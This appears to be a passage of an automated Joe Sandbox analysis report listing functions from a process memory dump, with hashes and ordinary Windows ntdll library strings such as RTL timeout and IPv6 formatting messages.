                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 3a4e006aae7525326c120084e32a2b2ded464aaf23875e8dd2187bec64cbb5af
                                                                                                                              • Instruction ID: 2e724267d4f3b52931b17a45a47e0f538b366b327f2ce9098836cb8f53afb8c1
                                                                                                                              • Opcode Fuzzy Hash: 3a4e006aae7525326c120084e32a2b2ded464aaf23875e8dd2187bec64cbb5af
                                                                                                                              • Instruction Fuzzy Hash: 88900225621400020145B558060460B0455A7D6351796C115F141A590CC62589666321
                                                                                                                              Function 01A22DB0 Relevance: .0, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 57f3a10b79bbc68451c95ac9316b2474f8e30648cecd790c11e740395e226363
                                                                                                                              • Instruction ID: 7cecd0cde09121ea00695b4ff1a82d0f8739523dc655a09e1de0f4a5ae41cd9c
                                                                                                                              • Opcode Fuzzy Hash: 57f3a10b79bbc68451c95ac9316b2474f8e30648cecd790c11e740395e226363
                                                                                                                              • Instruction Fuzzy Hash: 1490023164140402D141715844047060019A7D0241F96C112B0428554EC6598B57BB61
                                                                                                                              Function 01A22D00 Relevance: .0, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2f22b0ebb9eac295eee3939b5d8d68341b6241141a20f69141c8795e210918ea
                                                                                                                              • Instruction ID: 6a826da617231a136ae85b5f9a4004b0a12d90a6e751da490647c988e232a464
                                                                                                                              • Opcode Fuzzy Hash: 2f22b0ebb9eac295eee3939b5d8d68341b6241141a20f69141c8795e210918ea
                                                                                                                              • Instruction Fuzzy Hash: 8990022160544442D10075585408B06001597D0205F56D111B1068595DC6398952B231
                                                                                                                              Function 01A22CF0 Relevance: .0, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4c2a7eec1e7a8b9fbc4072e27c621e8b23ac68e97da20b977d10223d7d910ca2
                                                                                                                              • Instruction ID: 385fccf26379af753eaef4ad7160893a55d28e6655dca80d0ae2c7fb5f75c1c2
                                                                                                                              • Opcode Fuzzy Hash: 4c2a7eec1e7a8b9fbc4072e27c621e8b23ac68e97da20b977d10223d7d910ca2
                                                                                                                              • Instruction Fuzzy Hash: 4290023160140403D10071585508707001597D0201F56D511B0428558DD65A89527221
                                                                                                                              Function 01A22CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5f8f77148b80534aaf6f3b4d70c70b18f755c0e3ff1b61512f8c9849abe91bcd
                                                                                                                              • Instruction ID: 1fb22ca625991737077971289b5d788e69434292512b004bdb0f6da70db11180
                                                                                                                              • Opcode Fuzzy Hash: 5f8f77148b80534aaf6f3b4d70c70b18f755c0e3ff1b61512f8c9849abe91bcd
                                                                                                                              • Instruction Fuzzy Hash: BE900221A0540402D14071585418706002597D0201F56D111B0028554DC65D8B5677A1
                                                                                                                              Function 01A22C60 Relevance: .0, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2cf3d5c79e0b6a4601833691ca0259181ee193dee239df025aeee2ead1328f8e
                                                                                                                              • Instruction ID: 672a6156369efcf2e96d0c3b31a3c704d4548e90126b809d826f253be8fb006e
                                                                                                                              • Opcode Fuzzy Hash: 2cf3d5c79e0b6a4601833691ca0259181ee193dee239df025aeee2ead1328f8e
                                                                                                                              • Instruction Fuzzy Hash: 8790023160140842D10071584404B46001597E0301F56C116B0128654DC619C9527621
                                                                                                                              Function 01A22FA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 10d9369fd9ab193d321fe3c48d2ae509b0b1caf0fba18f58847f64989e752204
                                                                                                                              • Instruction ID: eb9a30871a0db67691e327825cebd751fa91bbb24a23e7d6dd38a6701b6f091b
                                                                                                                              • Opcode Fuzzy Hash: 10d9369fd9ab193d321fe3c48d2ae509b0b1caf0fba18f58847f64989e752204
                                                                                                                              • Instruction Fuzzy Hash: CE90023160180402D10071584808747001597D0302F56C111B5168555EC669C9927631
                                                                                                                              Function 01A22F60 Relevance: .0, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b2d5d1c6c70c0257996e35d2f544352c3e95294eb73e5d876e8ebd880278f3f8
                                                                                                                              • Instruction ID: 32892234f7644a215c61c685b9ee60fddd74b6cc5f7ae5acd2212f7dc870fc98
                                                                                                                              • Opcode Fuzzy Hash: b2d5d1c6c70c0257996e35d2f544352c3e95294eb73e5d876e8ebd880278f3f8
                                                                                                                              • Instruction Fuzzy Hash: FF90026161140042D10471584404706005597E1201F56C112B2158554CC52D8D626225
                                                                                                                              Function 01A22EE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f30d74b795e6d493bcce477de5aafa26592ce1b35de68910a47b3d471b55a366
                                                                                                                              • Instruction ID: 6cd5ddd1ce4ff3a4f4ffe860e3a9138ea4cb00e8f5badd6f3b11505ea65fe198
                                                                                                                              • Opcode Fuzzy Hash: f30d74b795e6d493bcce477de5aafa26592ce1b35de68910a47b3d471b55a366
                                                                                                                              • Instruction Fuzzy Hash: BA90026160180403D14075584804707001597D0302F56C111B2068555ECA2D8D527235
                                                                                                                              Function 01A22E30 Relevance: .0, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c84ee6b7c5a7d092b70c52ef74d437c6efe75d7cad9bec6930f32fc6cdf0453e
                                                                                                                              • Instruction ID: 55feef0a563d0788c4d7d8bea80b39857f483b2ad65aeeb25160721b3b375058
                                                                                                                              • Opcode Fuzzy Hash: c84ee6b7c5a7d092b70c52ef74d437c6efe75d7cad9bec6930f32fc6cdf0453e
                                                                                                                              • Instruction Fuzzy Hash: 7F90022170140402D102715844147060019D7D1345F96C112F1428555DC6298A53B232
                                                                                                                              Function 01A23090 Relevance: .0, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7fa6d6e79b48b41d83dce1a690570a2bc2c7b337b33d2d3806f32a54928698eb
                                                                                                                              • Instruction ID: 42f25f605c0ec525f0c27f318f0bc2bbec2cf5e4ef1fd24cf56a812aa1d14a1e
                                                                                                                              • Opcode Fuzzy Hash: 7fa6d6e79b48b41d83dce1a690570a2bc2c7b337b33d2d3806f32a54928698eb
                                                                                                                              • Instruction Fuzzy Hash: CB90022164140802D140715884147070016D7D0601F56C111B0028554DC61A8A6677B1
                                                                                                                              Function 01A23010 Relevance: .0, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 75eb8bc9e5a3b28b142620fda9e1c0349ed38885526728b3658970ba3541c7c3
                                                                                                                              • Instruction ID: bf854dd4e84bba4782b3b0be693dcee68dbecb4b4809a5ab006bda9f0f6fe7e2
                                                                                                                              • Opcode Fuzzy Hash: 75eb8bc9e5a3b28b142620fda9e1c0349ed38885526728b3658970ba3541c7c3
                                                                                                                              • Instruction Fuzzy Hash: E190022160184442D14072584804B0F411597E1202F96C119B415A554CC91989566721
                                                                                                                              Function 01A235C0 Relevance: .0, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c88c50a147dddc3356928fa356b09f91dce17060a49262e883d9acd556692805
                                                                                                                              • Instruction ID: 4edfbe1804ddd4bce89d2e671a3b0c2bd784bc7093c74cd41477dff196d881e5
                                                                                                                              • Opcode Fuzzy Hash: c88c50a147dddc3356928fa356b09f91dce17060a49262e883d9acd556692805
                                                                                                                              • Instruction Fuzzy Hash: 58900231A0550402D10071584514706101597D0201F66C511B0428568DC7998A5276A2
                                                                                                                              Function 01A239B0 Relevance: .0, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5088f660858c41020f7d50db696411fef86b0ad6c1eb6e566614aa75252be521
                                                                                                                              • Instruction ID: 0a0e1627cbfee19cf9dcf01a9701234b581cc104f1e7198f0e74ed25fdeed4d2
                                                                                                                              • Opcode Fuzzy Hash: 5088f660858c41020f7d50db696411fef86b0ad6c1eb6e566614aa75252be521
                                                                                                                              • Instruction Fuzzy Hash: AF90022164545102D150715C44047164015B7E0201F56C121B0818594DC55989567321
                                                                                                                              Function 01A23D10 Relevance: .0, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d4164ac56ce086e2b37a0fe42d1cf7a4f676eacd6fee2bd71227516accf04115
                                                                                                                              • Instruction ID: 0d73552fdfa5e124fdd9727daa92542d771c2e399ecde5c52c497a64c280e7dc
                                                                                                                              • Opcode Fuzzy Hash: d4164ac56ce086e2b37a0fe42d1cf7a4f676eacd6fee2bd71227516accf04115
                                                                                                                              • Instruction Fuzzy Hash: 8A90023160240142954072585804B4E411597E1302F96D515B0019554CC91889626321
                                                                                                                              Function 01A23D70 Relevance: .0, Instructions: 4COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: accaad74b4a9a778f09399df836490058cd5c8243973b20652666eb2e136912a
                                                                                                                              • Instruction ID: 73d322924501b4c4b8a23ec34689397536c7a860687e846af3e34059f98ac3b5
                                                                                                                              • Opcode Fuzzy Hash: accaad74b4a9a778f09399df836490058cd5c8243973b20652666eb2e136912a
                                                                                                                              • Instruction Fuzzy Hash: D890023560140402D51071585804746005697D0301F56D511B0428558DC65889A2B221
                                                                                                                              Function 01A22C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                              • Instruction ID: c1b24cbec5792fd382b899b0fad3b6d31dc7ce697c07307ba33e4d4d09c12b9c
                                                                                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                              Function 01A22890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                              • Opcode ID: a775ecd4f8d6c286caa672fd4d0c7f0f2fe062797e1789543e716930152a21da
                                                                                                                              • Instruction ID: 7afe379f24508fada484ae006d6a3d229e590ff5ea9fd91601a20aa65ac3b238
                                                                                                                              • Opcode Fuzzy Hash: a775ecd4f8d6c286caa672fd4d0c7f0f2fe062797e1789543e716930152a21da
                                                                                                                              • Instruction Fuzzy Hash: B351F9B2B04126BFDB21DFAC8990A7EFBB8BB49240754C22AF459D7641D374DE0087E0
                                                                                                                              Function 01A92410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                              • Opcode ID: 867c317862d70e99c3516147b4ded8b0b238e4ff0bdc7278df0ab14fa9e735f9
                                                                                                                              • Instruction ID: 06a494d64ecd279aa5a18eeac43db9abccb5aedea037cd8ed4837fd60ca6d9d0
                                                                                                                              • Opcode Fuzzy Hash: 867c317862d70e99c3516147b4ded8b0b238e4ff0bdc7278df0ab14fa9e735f9
                                                                                                                              • Instruction Fuzzy Hash: A951F8B5A00645BFDF34DFADC990A7FB7F8EB84200B04C46AF596D7682D674DA808760
                                                                                                                              Function 01A17630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01A54742
                                                                                                                              • Execute=1, xrefs: 01A54713
                                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01A54655
                                                                                                                              • ExecuteOptions, xrefs: 01A546A0
                                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01A54725
                                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01A546FC
                                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 01A54787
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                              • API String ID: 0-484625025
                                                                                                                              • Opcode ID: b9a3f316904a46ed4f6ed05af7f914b2175a1bbad2327f403916cedba2df271c
                                                                                                                              • Instruction ID: ee08f6a45a02e9adaeabd8bab27cb0675e896dcc6c70a13e23d15e933b938854
                                                                                                                              • Opcode Fuzzy Hash: b9a3f316904a46ed4f6ed05af7f914b2175a1bbad2327f403916cedba2df271c
                                                                                                                              • Instruction Fuzzy Hash: 23515D3160021ABAEF11EBE9ED95FBE77B8EF18700F0404ADE605A7181EB709E418F54
                                                                                                                              Function 01A2B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __aulldvrm
                                                                                                                              • String ID: +$-$0$0
                                                                                                                              • API String ID: 1302938615-699404926
                                                                                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                              • Instruction ID: f894948a83b951bcc2d3f357a4970c459fd513be251a2781018e76c541f6a6c6
                                                                                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                              • Instruction Fuzzy Hash: 4E81AF70E062699FEF29CF6CC8917FEBBB2AF45320F1C4559D861A7291C77498408B71
                                                                                                                              Function 01A920E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: %%%u$[$]:%u
                                                                                                                              • API String ID: 48624451-2819853543
                                                                                                                              • Opcode ID: 9fc4e70062cd12259d727dd8e0d24d8253f310ea0f17efb14ec13c5e8aa08677
                                                                                                                              • Instruction ID: 3ff5a662fa6b8707811663900b0010b5abe1e94c651e6ce7cebad05373183a5d
                                                                                                                              • Opcode Fuzzy Hash: 9fc4e70062cd12259d727dd8e0d24d8253f310ea0f17efb14ec13c5e8aa08677
                                                                                                                              • Instruction Fuzzy Hash: 762135BAA00219ABDB11DF7DDD40BFEBBF8EF54654F550116E905E3200E730DA518BA1
                                                                                                                              Function 01A0F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • RTL: Re-Waiting, xrefs: 01A5031E
                                                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01A502E7
                                                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01A502BD
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                              • API String ID: 0-2474120054
                                                                                                                              • Opcode ID: 613d2e2bfd1a93f8269dea05624fa15ac52551f085b063bd0fd998f4181910ca
                                                                                                                              • Instruction ID: 5015f535675ba876511c17fea9017ca436a171922b8356b04b66b0713948f34d
                                                                                                                              • Opcode Fuzzy Hash: 613d2e2bfd1a93f8269dea05624fa15ac52551f085b063bd0fd998f4181910ca
                                                                                                                              • Instruction Fuzzy Hash: 13E1BF706087429FD726CF28D984B2ABBE0BF84724F180A1DF9A5DB2E1D774D945CB42
                                                                                                                              Function 01A1BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • RTL: Re-Waiting, xrefs: 01A57BAC
                                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01A57B7F
                                                                                                                              • RTL: Resource at %p, xrefs: 01A57B8E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                              • API String ID: 0-871070163
                                                                                                                              • Opcode ID: cb6e5dec69e1738c523877b4ffd841602254babb6b2d9a421e9c0915d18b457d
                                                                                                                              • Instruction ID: e4897291fc53a4f56247f85904fe3c6581e7486526a51920e2978a25662fd743
                                                                                                                              • Opcode Fuzzy Hash: cb6e5dec69e1738c523877b4ffd841602254babb6b2d9a421e9c0915d18b457d
                                                                                                                              • Instruction Fuzzy Hash: 9A41D1317057029FD724DF29D940B6AB7F6EF98720F100A1DF95AEB690DB31E8058BA1
                                                                                                                              Function 01A1B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A5728C
                                                                                                                              Strings
                                                                                                                              • RTL: Re-Waiting, xrefs: 01A572C1
                                                                                                                              • RTL: Resource at %p, xrefs: 01A572A3
                                                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01A57294
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                              • API String ID: 885266447-605551621
                                                                                                                              • Opcode ID: 59764f010eca5c650976c31d01c2af4a1c4a16f2db3ce252aad600e8d3a88494
                                                                                                                              • Instruction ID: b489672357395eb8de39a103302df1d7c1471e6fd944bb71b5cadf90afdc1190
                                                                                                                              • Opcode Fuzzy Hash: 59764f010eca5c650976c31d01c2af4a1c4a16f2db3ce252aad600e8d3a88494
                                                                                                                              • Instruction Fuzzy Hash: 06410031744202AFC720CF6ACC41B6ABBB5FB98750F144619FD55EB281DB31E8028BE1
                                                                                                                              Function 01A92300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1670145600.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_19b0000_JHnNxt6Pnb.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ___swprintf_l
                                                                                                                              • String ID: %%%u$]:%u
                                                                                                                              • API String ID: 48624451-3050659472
                                                                                                                              • Opcode ID: 038176fc7cde7e10c8d4fa12af5fba39e7c2662be990fd46971b7ebdb1d3c6f9
